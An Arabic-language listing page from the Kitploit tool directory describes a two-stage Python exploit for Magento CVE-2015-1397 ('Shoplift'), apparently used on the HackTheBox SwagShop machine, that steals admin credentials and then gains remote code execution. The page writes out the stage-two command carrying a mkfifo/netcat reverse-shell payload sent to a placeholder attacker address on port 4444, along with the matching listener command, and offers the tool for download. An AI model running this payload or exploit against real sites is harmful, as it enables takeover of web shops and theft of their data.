Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1397-Magento-Shoplift — استغلال بايثون ثنائي المرحلة لـ CVE-2015-1397 يستهدف نظام Magento CMS للحصول على بيانات اعتماد المسؤول وتنفيذ كود عن بُعد عبر حقن أوامر مصادق عليه. | Kitploit
أدوات/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

استغلال بايثون ثنائي المرحلة لـ CVE-2015-1397 يستهدف نظام Magento CMS للحصول على بيانات اعتماد المسؤول وتنفيذ كود عن بُعد عبر حقن أوامر مصادق عليه.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

CVE-2015-1397-Magento-Shoplift

تفاصيل الثغرة

الثغرة كما تظهر في HackTheBox - SwagShop

المرحلة 1 = exploit.py

الحصول على بيانات اعتماد المسؤول للوحة تحكم Magento CMS

المرحلة 2 = post_auth.py

بعد الحصول على بيانات الاعتماد من exploit.py وإضافتها إلى post_auth.py، قم بتشغيل:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

المستمع:

root@kitploit:~
nc -lvnp 4444
تنزيل الأداة